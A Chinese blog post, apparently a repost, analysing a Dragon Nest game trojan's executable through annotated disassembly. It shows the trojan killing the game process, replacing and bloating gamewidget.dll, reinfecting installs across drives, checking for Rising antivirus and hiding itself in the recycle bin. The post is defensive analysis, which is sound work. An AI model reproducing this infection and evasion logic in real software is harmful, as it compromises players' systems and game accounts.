只分析了exe,感染的dll下次分析
exe
去除启动时候的小漏斗
004017C9 |. 53 push ebx 004017CA |. 55 push ebp 004017CB |. 56 push esi 004017CC |. 57 push edi 004017CD |. FF15 AC104000 call dword ptr [<&USER32.GetInputStat>; [GetInputState 004017D3 |. 33DB xor ebx, ebx 004017D5 |. 53 push ebx ; /lParam => 0 004017D6 |. 53 push ebx ; |wParam => 0 004017D7 |. 53 push ebx ; |Message => WM_NULL 004017D8 |. FF15 64104000 call dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId 004017DE |. 50 push eax ; |ThreadId 004017DF |. FF15 B0104000 call dword ptr [<&USER32.PostThreadMe>; PostThreadMessageA 004017E5 |. 53 push ebx ; /MsgFilterMax => 0 004017E6 |. 53 push ebx ; |MsgFilterMin => 0 004017E7 |. 8D4424 1C lea eax, dword ptr [esp+1C] ; | 004017EB |. 53 push ebx ; |hWnd => NULL 004017EC |. 50 push eax ; |pMsg 004017ED |. FF15 B4104000 call dword ptr [<&USER32.GetMessageA>>; GetMessageA
读取附加数据
004017F8 |. 68 1C284000 push 0040281C ; /Buffer = ctfmon.0040281C 004017FD |. 56 push esi ; |BufSize => 104 (260.) 004017FE |. FF15 60104000 call dword ptr [<&KERNEL32.GetLogical>; GetLogicalDriveStringsA 00401804 |. 6A 40 push 40 ; 获取磁盘 00401806 |. 33C0 xor eax, eax 00401808 |. 59 pop ecx 00401809 |. 8D7C24 31 lea edi, dword ptr [esp+31] 0040180D |. 885C24 30 mov byte ptr [esp+30], bl 00401811 |. 56 push esi ; /BufSize => 104 (260.) 00401812 |. F3:AB rep stos dword ptr es:[edi] ; | 00401814 |. 66:AB stos word ptr es:[edi] ; | 00401816 |. AA stos byte ptr es:[edi] ; | 00401817 |. 8D4424 34 lea eax, dword ptr [esp+34] ; | 0040181B |. 895C24 14 mov dword ptr [esp+14], ebx ; | 0040181F |. 50 push eax ; |PathBuffer 00401820 |. 53 push ebx ; |hModule => NULL 00401821 |. FF15 48104000 call dword ptr [<&KERNEL32.GetModuleF>; GetModuleFileNameA 00401827 |. 8B3D 5C104000 mov edi, dword ptr [<&KERNEL32.SetFi>; 获取自身路径 0040182D |. 8B2D 58104000 mov ebp, dword ptr [<&KERNEL32.ReadF>; kernel32.ReadFile 00401833 |> 53 /push ebx ; /hTemplateFile 00401834 |. 53 |push ebx ; |Attributes 00401835 |. 6A 03 |push 3 ; |Mode = OPEN_EXISTING 00401837 |. 53 |push ebx ; |pSecurity 00401838 |. 53 |push ebx ; |ShareMode 00401839 |. 8D4424 44 |lea eax, dword ptr [esp+44] ; | 0040183D |. 68 00000080 |push 80000000 ; |Access = GENERIC_READ 00401842 |. 50 |push eax ; |FileName 00401843 |. FF15 28104000 |call dword ptr [<&KERNEL32.CreateFil>; CreateFileA 00401849 |. 8BF0 |mov esi, eax ; 打开自身 0040184B |. 3BF3 |cmp esi, ebx 0040184D |. 74 3B |je short 0040188A 0040184F |. 6A 02 |push 2 00401851 |. 53 |push ebx 00401852 |. 68 3CFEFFFF |push -1C4 00401857 |. 56 |push esi 00401858 |. FFD7 |call edi ; kernel32.SetFilePointer 0040185A |. 8D4424 10 |lea eax, dword ptr [esp+10] ; 设置指针 0040185E |. 53 |push ebx 0040185F |. 50 |push eax 00401860 |. 68 C4010000 |push 1C4 00401865 |. 68 201A4000 |push 00401A20 0040186A |. 56 |push esi 0040186B |. FFD5 |call ebp ; kernel32.ReadFile 0040186D |. A1 E01B4000 |mov eax, dword ptr [401BE0] ; 读取附加数据 00401872 |. 3BC3 |cmp eax, ebx 00401874 |. 77 23 |ja short 00401899 00401876 |. 68 E8030000 |push 3E8 ; /Timeout = 1000. ms 0040187B |. FF15 44104000 |call dword ptr [<&KERNEL32.Sleep>] ; Sleep 00401881 |. 56 |push esi ; /hObject 00401882 |. FF15 20104000 |call dword ptr [<&KERNEL32.CloseHand>; CloseHandle 00401888 |.^ EB A9 jmp short 00401833 ; 读取失败则返回 0040188A |> 5F pop edi 0040188B |. 5E pop esi 0040188C |. 5D pop ebp 0040188D |. 33C0 xor eax, eax 0040188F |. 5B pop ebx 00401890 |. 81C4 2C030000 add esp, 32C 00401896 |. C2 1000 retn 10 00401899 |> 50 push eax 0040189A |. E8 69010000 call <jmp.&MSVCRT.operator new> 0040189F |. A3 20294000 mov dword ptr [402920], eax 004018A4 |. B8 3CFEFFFF mov eax, -1C4 004018A9 |. 2B05 E01B4000 sub eax, dword ptr [401BE0] 004018AF |. 59 pop ecx 004018B0 |. 6A 02 push 2 004018B2 |. 53 push ebx 004018B3 |. 50 push eax 004018B4 |. 56 push esi 004018B5 |. FFD7 call edi ; kernel32.SetFilePointer 004018B7 |. 8D4424 10 lea eax, dword ptr [esp+10] ; 设置文件指针 004018BB |. 53 push ebx 004018BC |. 50 push eax 004018BD |. FF35 E01B4000 push dword ptr [401BE0] 004018C3 |. FF35 20294000 push dword ptr [402920] 004018C9 |. 56 push esi 004018CA |. FFD5 call ebp ; kernel32.ReadFile 004018CC |. 56 push esi ; /读取附加数据 004018CD |. FF15 20104000 call dword ptr [<&KERNEL32.CloseHandl>; CloseHandle 004018D3 |. E8 4CF9FFFF call 00401224 ; 释放句柄
查找龙之谷进程,找到则结束该进程
004011C0 /$ 55 push ebp ; kernel32.ReadFile 004011C1 |. 8BEC mov ebp, esp 004011C3 |. 81EC 28010000 sub esp, 128 004011C9 |. 56 push esi 004011CA |. 6A 00 push 0 ; /ProcessID = 0 004011CC |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS 004011CE |. E8 23080000 call <jmp.&KERNEL32.CreateToolhelp32S>; CreateToolhelp32Snapshot 004011D3 |. 8BF0 mov esi, eax 004011D5 |. 8D85 D8FEFFFF lea eax, dword ptr [ebp-128] 004011DB |. 50 push eax ; /lppe 004011DC |. 56 push esi ; |hSnapshot 004011DD |. C785 D8FEFFFF>mov dword ptr [ebp-128], 128 ; | 004011E7 |. E8 04080000 call <jmp.&KERNEL32.Process32First> ; Process32First 004011EC |. 85C0 test eax, eax 004011EE |. 74 2F je short 0040121F 004011F0 |> 8D85 D8FEFFFF /lea eax, dword ptr [ebp-128] 004011F6 |. 50 |push eax ; /lppe 004011F7 |. 56 |push esi ; |hSnapshot 004011F8 |. E8 ED070000 |call <jmp.&KERNEL32.Process32Next> ; Process32Next 004011FD |. 85C0 |test eax, eax 004011FF |. 74 1E |je short 0040121F 00401201 |. 8D85 FCFEFFFF |lea eax, dword ptr [ebp-104] 00401207 |. 50 |push eax ; /s2 00401208 |. FF75 08 |push dword ptr [ebp+8] ; |s1 0040120B |. FF15 9C104000 |call dword ptr [<&MSVCRT._stricmp>] ; _stricmp 00401211 |. 59 |pop ecx ; 查找龙之谷进程 00401212 |. 85C0 |test eax, eax 00401214 |. 59 |pop ecx 00401215 |.^ 75 D9 jnz short 004011F0 00401217 |. 8B85 E0FEFFFF mov eax, dword ptr [ebp-120] 0040121D |. EB 02 jmp short 00401221 0040121F |> 33C0 xor eax, eax 00401221 |> 5E pop esi 00401222 |. C9 leave 00401223 . C3 retn 0040122F |. 50 push eax ; /ProcessId 00401230 |. 6A 00 push 0 ; |Inheritable = FALSE 00401232 |. 6A 01 push 1 ; |Access = TERMINATE 00401234 |. FF15 10104000 call dword ptr [<&KERNEL32.OpenProces>; OpenProcess 0040123A |. 6A 00 push 0 ; /ExitCode = 0 0040123C |. 50 push eax ; |hProcess 0040123D |. FF15 3C104000 call dword ptr [<&KERNEL32.TerminateP>; TerminateProcess 00401243 . C3 retn ; 存在则结束进程
游戏目录下原来的gamewidget.dll拷贝DragonNestRes.dll,然后感染gamewidget.dll并复制一份midimap.dll
004015C2 |. 50 push eax ; /pHandle 004015C3 |. 33DB xor ebx, ebx ; | 004015C5 |. 68 19000200 push 20019 ; |Access = KEY_READ 004015CA |. 53 push ebx ; |Reserved => 0 004015CB |. 68 64114000 push 00401164 ; |Subkey = "SOFTWAREsndadn" 004015D0 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE 004015D5 |. FF15 08104000 call dword ptr [<&ADVAPI32.RegOpenKey>; RegOpenKeyExA 004015DB |. 85C0 test eax, eax ; 读取HKEY_LOCAL_MACHINESOFTWAREsndadn 004015DD |. /0F85 8C000000 jnz 0040166F ; 读取不到则返回 004015E3 |. |6A 40 push 40 004015E5 |. |8DBD F1FEFFFF lea edi, dword ptr [ebp-10F] 004015EB |. |59 pop ecx 004015EC |. |889D F0FEFFFF mov byte ptr [ebp-110], bl 004015F2 |. |F3:AB rep stos dword ptr es:[edi] 004015F4 |. |66:AB stos word ptr es:[edi] 004015F6 |. |AA stos byte ptr es:[edi] 004015F7 |. |8D45 F8 lea eax, dword ptr [ebp-8] 004015FA |. |C745 F4 01000>mov dword ptr [ebp-C], 1 00401601 |. |50 push eax ; /pBufSize 00401602 |. |8D85 F0FEFFFF lea eax, dword ptr [ebp-110] ; | 00401608 |. |50 push eax ; |Buffer 00401609 |. |8D45 F4 lea eax, dword ptr [ebp-C] ; | 0040160C |. |50 push eax ; |pValueType 0040160D |. |53 push ebx ; |Reserved => NULL 0040160E |. |68 58114000 push 00401158 ; |ValueName = "MainProg" 00401613 |. |C745 F8 04010>mov dword ptr [ebp-8], 104 ; | 0040161A |. |FF75 FC push dword ptr [ebp-4] ; |hKey 0040161D |. |FF15 04104000 call dword ptr [<&ADVAPI32.RegQueryVa>; RegQueryValueExA 00401623 |. |85C0 test eax, eax ; 读取路径 004013B3 |. 50 push eax ; /FileName 004013B4 |. FF15 30104000 call dword ptr [<&KERNEL32.GetFileAtt>; GetFileAttributesA 004013BA |. 83F8 FF cmp eax, -1 ; 获取文件的属性,用来判断DragonNestRes.dll是否存在 004013BD |. 75 15 jnz short 004013D4 004013BF |. 8D85 F4FDFFFF lea eax, dword ptr [ebp-20C] 004013C5 |. 53 push ebx ; /FailIfExists 004013C6 |. 50 push eax ; |NewFileName 004013C7 |. 8D85 F8FEFFFF lea eax, dword ptr [ebp-108] ; | 004013CD |. 50 push eax ; |ExistingFileName 004013CE |. FF15 2C104000 call dword ptr [<&KERNEL32.CopyFileA>>; CopyFileA 004013D4 |> 8D85 F8FEFFFF lea eax, dword ptr [ebp-108] ; 不存在则在游戏目录用原来的gamewidget.dll拷贝DragonNestRes.dll 00401299 /$ 55 push ebp 0040129A |. 8BEC mov ebp, esp 0040129C |. 81EC 08020000 sub esp, 208 004012A2 |. 56 push esi 004012A3 |. 8B75 08 mov esi, dword ptr [ebp+8] 004012A6 |. 56 push esi ; /FileName 004012A7 |. FF15 1C104000 call dword ptr [<&KERNEL32.DeleteFile>; DeleteFileA 004012AD |. 6A 00 push 0 ; /删除gamewidget.dll 004012AF |. 56 push esi ; |path 004012B0 |. FF15 A0104000 call dword ptr [<&MSVCRT._access>] ; _access 004012B6 |. 59 pop ecx ; 判断是否删除成功 00401401 |. 53 push ebx ; /hTemplateFile 00401402 |. 53 push ebx ; |Attributes 00401403 |. 6A 01 push 1 ; |Mode = CREATE_NEW 00401405 |. 53 push ebx ; |pSecurity 00401406 |. 53 push ebx ; |ShareMode 00401407 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE 0040140C |. 50 push eax ; |FileName 0040140D |. FF15 28104000 call dword ptr [<&KERNEL32.CreateFile>; CreateFileA 00401413 |. 8BF8 mov edi, eax ; 创建新的gamewidget.dll 00401415 |. 3BFB cmp edi, ebx 00401417 |. 75 07 jnz short 00401420 00401419 |. 33C0 xor eax, eax 0040141B |. E9 A5000000 jmp 004014C5 00401420 |> 8D45 FC lea eax, dword ptr [ebp-4] 00401423 |. 53 push ebx ; /pOverlapped 00401424 |. 50 push eax ; |pBytesWritten 00401425 |. 8B35 24104000 mov esi, dword ptr [<&KERNEL32.Write>; |kernel32.WriteFile 0040142B |. FF35 E01B4000 push dword ptr [401BE0] ; |nBytesToWrite = 2A00 (10752.) 00401431 |. FF35 20294000 push dword ptr [402920] ; |Buffer = 003D4380 00401437 |. 57 push edi ; |hFile 00401438 |. FFD6 call esi ; WriteFile 0040143A |. C745 0C D0070>mov dword ptr [ebp+C], 7D0 ; 写入DLL 00401441 |> /8D45 FC /lea eax, dword ptr [ebp-4] 00401444 |. |53 |push ebx 00401445 |. |50 |push eax 00401446 |. |FF35 E01B4000 |push dword ptr [401BE0] 0040144C |. |FF35 20294000 |push dword ptr [402920] 00401452 |. |57 |push edi 00401453 |. |FFD6 |call esi 00401455 |. |FF4D 0C |dec dword ptr [ebp+C] 00401458 |.^75 E7 jnz short 00401441 ; 再重复写入2000次,曾大文件体积 0040145A |. 8D45 FC lea eax, dword ptr [ebp-4] 0040145D |. 53 push ebx 0040145E |. 50 push eax 0040145F |. 68 C4010000 push 1C4 00401464 |. 68 201A4000 push 00401A20 00401469 |. 57 push edi 0040146A |. FFD6 call esi ; kernel32.WriteFile 0040146C |. 57 push edi ; /写入附加数据 0040146D |. FF15 20104000 call dword ptr [<&KERNEL32.CloseHandl>; CloseHandle 00401473 |. 6A 40 push 40 ; 释放句柄 004014AD |. 8D85 F0FCFFFF lea eax, dword ptr [ebp-310] 004014B3 |. 53 push ebx ; /FailIfExists 004014B4 |. 50 push eax ; |NewFileName 004014B5 |. 8D85 F8FEFFFF lea eax, dword ptr [ebp-108] ; | 004014BB |. 50 push eax ; |ExistingFileName = "C:Program Files?,A2,"",B4,"笸鏫龙之谷gamewidget.dll" 004014BC |. FF15 2C104000 call dword ptr [<&KERNEL32.CopyFileA>>; CopyFileA 004014C2 |. 6A 01 push 1 ; 已经替换的gamewidget.dll拷贝midimap.dll
再次感染
00401684 |. 50 push eax ; /pHandle 00401685 |. 33DB xor ebx, ebx ; | 00401687 |. 68 19000200 push 20019 ; |Access = KEY_READ 0040168C |. 53 push ebx ; |Reserved => 0 0040168D |. 68 84114000 push 00401184 ; |Subkey = "SoftwareMicrosoftWindowsShellNoRoamMUICache" 00401692 |. 68 01000080 push 80000001 ; |hKey = HKEY_CURRENT_USER 00401697 |. FF15 08104000 call dword ptr [<&ADVAPI32.RegOpenKey>; RegOpenKeyExA 0040169D |. 85C0 test eax, eax ; 打开HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache 0040169F |. /0F85 17010000 jnz 004017BC 004016A5 |. |895D FC mov dword ptr [ebp-4], ebx 004016A8 |. |BE 04010000 mov esi, 104 004016AD |> |6A 40 /push 40 004016AF |. |33C0 |xor eax, eax 004016B1 |. |59 |pop ecx 004016B2 |. |8DBD E5FEFFFF |lea edi, dword ptr [ebp-11B] 004016B8 |. |889D E4FEFFFF |mov byte ptr [ebp-11C], bl 004016BE |. |6A 40 |push 40 004016C0 |. |F3:AB |rep stos dword ptr es:[edi] 004016C2 |. |66:AB |stos word ptr es:[edi] 004016C4 |. |AA |stos byte ptr es:[edi] 004016C5 |. |59 |pop ecx 004016C6 |. |33C0 |xor eax, eax 004016C8 |. |8DBD D9FBFFFF |lea edi, dword ptr [ebp-427] 004016CE |. |889D D8FBFFFF |mov byte ptr [ebp-428], bl 004016D4 |. |F3:AB |rep stos dword ptr es:[edi] 004016D6 |. |8D4D EC |lea ecx, dword ptr [ebp-14] 004016D9 |. |8975 F0 |mov dword ptr [ebp-10], esi 004016DC |. |51 |push ecx ; /pBufSize 004016DD |. |8D8D D8FBFFFF |lea ecx, dword ptr [ebp-428] ; | 004016E3 |. |51 |push ecx ; |Buffer 004016E4 |. |8D4D F8 |lea ecx, dword ptr [ebp-8] ; | 004016E7 |. |66:AB |stos word ptr es:[edi] ; | 004016E9 |. |51 |push ecx ; |pValueType 004016EA |. |8D4D F0 |lea ecx, dword ptr [ebp-10] ; | 004016ED |. |53 |push ebx ; |Reserved 004016EE |. |51 |push ecx ; |pValueCount 004016EF |. |AA |stos byte ptr es:[edi] ; | 004016F0 |. |8B45 FC |mov eax, dword ptr [ebp-4] ; | 004016F3 |. |FF45 FC |inc dword ptr [ebp-4] ; | 004016F6 |. |8D8D E4FEFFFF |lea ecx, dword ptr [ebp-11C] ; | 004016FC |. |C745 F8 01000>|mov dword ptr [ebp-8], 1 ; | 00401703 |. |51 |push ecx ; |Value 00401704 |. |50 |push eax ; |Index 00401705 |. |FF75 F4 |push dword ptr [ebp-C] ; |hKey 00401708 |. |8975 EC |mov dword ptr [ebp-14], esi ; | 0040170B |. |FF15 00104000 |call dword ptr [<&ADVAPI32.RegEnumVa>; RegEnumValueA 00401711 |. |85C0 |test eax, eax ; 读取键值 00401713 |. |0F85 A3000000 |jnz 004017BC 00401719 |. |6A 40 |push 40 0040171B |. |8DBD DDFCFFFF |lea edi, dword ptr [ebp-323] 00401721 |. |59 |pop ecx 00401722 |. |889D DCFCFFFF |mov byte ptr [ebp-324], bl 00401728 |. |F3:AB |rep stos dword ptr es:[edi] 0040172A |. |66:AB |stos word ptr es:[edi] 0040172C |. |AA |stos byte ptr es:[edi] 0040172D |. |8D45 E8 |lea eax, dword ptr [ebp-18] 00401730 |. |8975 E8 |mov dword ptr [ebp-18], esi 00401733 |. |50 |push eax ; /pBufSize 00401734 |. |8D85 DCFCFFFF |lea eax, dword ptr [ebp-324] ; | 0040173A |. |50 |push eax ; |Buffer 0040173B |. |8D45 F8 |lea eax, dword ptr [ebp-8] ; | 0040173E |. |50 |push eax ; |pValueType 0040173F |. |8D85 E4FEFFFF |lea eax, dword ptr [ebp-11C] ; | 00401745 |. |53 |push ebx ; |Reserved 00401746 |. |50 |push eax ; |ValueName 00401747 |. |FF75 F4 |push dword ptr [ebp-C] ; |hKey 0040174A |. |FF15 04104000 |call dword ptr [<&ADVAPI32.RegQueryV>; RegQueryValueExA 00401750 |. |85C0 |test eax, eax ; 读取LangID 00401752 |.^|0F85 55FFFFFF |jnz 004016AD 00401758 |. |8D85 DCFCFFFF |lea eax, dword ptr [ebp-324] 0040175E |. |68 78114000 |push 00401178 ; /s2 = "dragonnest" 00401763 |. |50 |push eax ; |s1 = "?,AC,"?,B6,"终",B6,"? 00401764 |. |FF15 8C104000 |call dword ptr [<&MSVCRT.strstr>] ; strstr 0040176A |. |59 |pop ecx ; 查找值为dragonnest的项 0040176B |. |85C0 |test eax, eax 0040176D |. |59 |pop ecx 0040176E |.^|0F84 39FFFFFF je 004016AD ……再一次感染。。。
查找瑞星进程,没找到则把自身移动到回收站,随机文件名
004018E2 |. BD B4114000 mov ebp, 004011B4 ; ASCII "RavMonD.exe" 004018E7 |. 55 push ebp 004018E8 |. E8 D3F8FFFF call 004011C0 ; 查找RavMonD.exe,没找到则把自身移动到回收站,随机文件名 00401511 |. 68 04010000 push 104 ; /BufSize = 104 (260.) 00401516 |. 50 push eax ; |PathBuffer 00401517 |. 6A 00 push 0 ; |hModule = NULL 00401519 |. FF15 48104000 call dword ptr [<&KERNEL32.GetModuleF>; GetModuleFileNameA 0040151F |. 8B35 54104000 mov esi, dword ptr [<&KERNEL32.GetTi>; 获取自身路径 00401525 |. FFD6 call esi ; [GetTickCount 00401527 |. 50 push eax ; /获取启动时间 00401528 |. 8B3D A8104000 mov edi, dword ptr [<&USER32.wsprint>; |USER32.wsprintfA 0040152E |. 0FBE85 FCFEFF>movsx eax, byte ptr [ebp-104] ; | 00401535 |. 50 push eax ; |<%c> 00401536 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] ; | 0040153C |. 68 44114000 push 00401144 ; |Format = "%c:RECYCLER%d.tmp" 00401541 |. 50 push eax ; |s 00401542 |. FFD7 call edi ; wsprintfA 00401544 |. 8B1D 1C104000 mov ebx, dword ptr [<&KERNEL32.Delet>; 构造路径C:RECYCLER4143625.tmp 0040154A |. 83C4 10 add esp, 10 0040154D |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] 00401553 |. 50 push eax ; /FileName 00401554 |. FFD3 call ebx ; DeleteFileA 00401556 |. 85C0 test eax, eax ; 删除文件(如果已存在) 00401558 |. 75 30 jnz short 0040158A 0040155A |. FF15 50104000 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError 00401560 |. 83F8 03 cmp eax, 3 00401563 |. 75 25 jnz short 0040158A 00401565 |. FFD6 call esi 00401567 |. 50 push eax ; 获取启动时间 00401568 |. 0FBE85 FCFEFF>movsx eax, byte ptr [ebp-104] 0040156F |. 50 push eax 00401570 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] 00401576 |. 68 30114000 push 00401130 ; ASCII "%c:Recycled%d.tmp" 0040157B |. 50 push eax 0040157C |. FFD7 call edi ; wsprintfA 0040157E |. 83C4 10 add esp, 10 ; 构造C:Recycled4273328.tmp 00401581 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] 00401587 |. 50 push eax 00401588 |. FFD3 call ebx 0040158A |> 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] ; 删除文件(如果已存在) 00401590 |. 50 push eax ; /NewName 00401591 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104] ; | 00401597 |. 50 push eax ; |ExistingName 00401598 |. FF15 4C104000 call dword ptr [<&KERNEL32.MoveFileA>>; MoveFileA 0040159E |. 6A 04 push 4 ; /移动自身到C:Recycled4273328.tmp 004015A0 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] ; | 004015A6 |. 6A 00 push 0 ; |NewName = NULL 004015A8 |. 50 push eax ; |ExistingName 004015A9 |. FF15 14104000 call dword ptr [<&KERNEL32.MoveFileEx>; MoveFileExA
感染安装龙之谷的所有磁盘
[sourcode]
004018F7 |> 6A 40 /push 40
004018F9 |. |33C0 |xor eax, eax
004018FB |. |59 |pop ecx
004018FC |. |8DBC24 350100>|lea edi, dword ptr [esp+135]
00401903 |. |889C24 340100>|mov byte ptr [esp+134], bl
0040190A |. |BE 1C284000 |mov esi, 0040281C ; ASCII “A:”
0040190F |. |F3:AB |rep stos dword ptr es:[edi]
00401911 |. |66:AB |stos word ptr es:[edi]
00401913 |. |AA |stos byte ptr es:[edi]
00401914 |. |33FF |xor edi, edi
00401916 |. |381D 1C284000 |cmp byte ptr [40281C], bl
0040191C |. |0F84 84000000 |je 004019A6
00401922 |> |56 |/push esi ; /RootPathName
00401923 |. |FF15 38104000 ||call dword ptr [<&KERNEL32.GetDrive>; GetDriveTypeA
00401929 |. |83F8 03 ||cmp eax, 3 ; 获取磁盘类型
0040192C |. |75 63 ||jnz short 00401991 ; 判断是否为固定磁盘
0040192E |. |8D8424 340100>||lea eax, dword ptr [esp+134] ; 是则执行
00401935 |. |50 ||push eax
00401936 |. |68 C8104000 ||push 004010C8 ; ASCII “dnlauncher.exe”
0040193B |. |56 ||push esi
0040193C |. |FF15 BC104000 ||call dword ptr [<&dbghelp.SearchTre>; dbghelp.SearchTreeForFile
00401942 |. |85C0 ||test eax, eax ; 查找是否存在dnlauncher.exe
00401944 |. |74 4B ||je short 00401991
00401946 |. |6A 40 ||push 40
00401948 |. |33C0 ||xor eax, eax
0040194A |. |59 ||pop ecx
0040194B |. |8DBC24 390200>||lea edi, dword ptr [esp+239]
00401952 |. |889C24 380200>||mov byte ptr [esp+238], bl
00401959 |. |53 ||push ebx
0040195A |. |F3:AB ||rep stos dword ptr es:[edi]
0040195C |. |66:AB ||stos word ptr es:[edi]
0040195E |. |AA ||stos byte ptr es:[edi]
0040195F |. |8D8424 3C0200>||lea eax, dword ptr [esp+23C]
00401966 |. |50 ||push eax
00401967 |. |8D8424 3C0100>||lea eax, dword ptr [esp+13C]
0040196E |. |50 ||push eax
0040196F |. |E8 D0F8FFFF ||call 00401244 ; 取dnlauncher.exe的路径
00401974 |. |E8 ABF8FFFF ||call 00401224 ; 结束进程
00401979 |. |8D8424 440200>||lea eax, dword ptr [esp+244]
00401980 |. |68 E8104000 ||push 004010E8 ; ASCII “gamewidget.dll”
00401985 |. |50 ||push eax
00401986 |. |E8 BAF9FFFF ||call 00401345 ; 再次感染
0040198B |. |83C4 14 ||add esp, 14
0040198E |. |6A 01 ||push 1
00401990 |. |5F ||pop edi
00401991 |> |56 ||push esi ; /String
00401992 |. |FF15 34104000 ||call dword ptr [<&KERNEL32.lstrlenA>; lstrlenA
00401998 |. |385C06 01 ||cmp byte ptr [esi+eax+1], bl
0040199C |. |8D7406 01 ||lea esi, dword ptr [esi+eax+1]
004019A0 |.^|75 80 |jnz short 00401922
004019A2 |. |3BFB |cmp edi, ebx
004019A4 |. |75 10 |jnz short 004019B6
004019A6 |> |68 20BF0200 |push 2BF20 ; /Timeout = 180000. ms
004019AB |. |FF15 44104000 |call dword ptr [<&KERNEL32.Sleep>] ; Sleep
004019B1 |.^E9 41FFFFFF jmp 004018F7
004019B6 |> FF35 20294000 push dword ptr [402920]
004019BC |. E8 4D000000 call <jmp.&MSVCRT.operator delete>
004019C1 |. 55 push ebp
004019C2 |. E8 F9F7FFFF call 004011C0
004019C7 |. 59 pop ecx
004019C8 |. 85C0 test eax, eax
004019CA |. 59 pop ecx
004019CB |. 75 07 jnz short 004019D4
004019CD |. E8 16FBFFFF call 004014E8
004019D2 |. EB 0E jmp short 004019E2
004019D4 |> 6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
004019D6 |. 8D4424 34 lea eax, dword ptr [esp+34] ; |
004019DA |. 53 push ebx ; |NewName
004019DB |. 50 push eax ; |ExistingName
004019DC |. FF15 14104000 call dword ptr [<&KERNEL32.MoveFileEx>; MoveFileExA
004019E2 |> 53 push ebx ; /自身移动到回收站
004019E3 |. FF15 7C104000 call dword ptr [<&MSVCRT.exit>] ; exit
004019E9 |. CC int3 ; 退出
[/sourcode]
转载请注明:爱开源 » 一个龙之谷木马的分析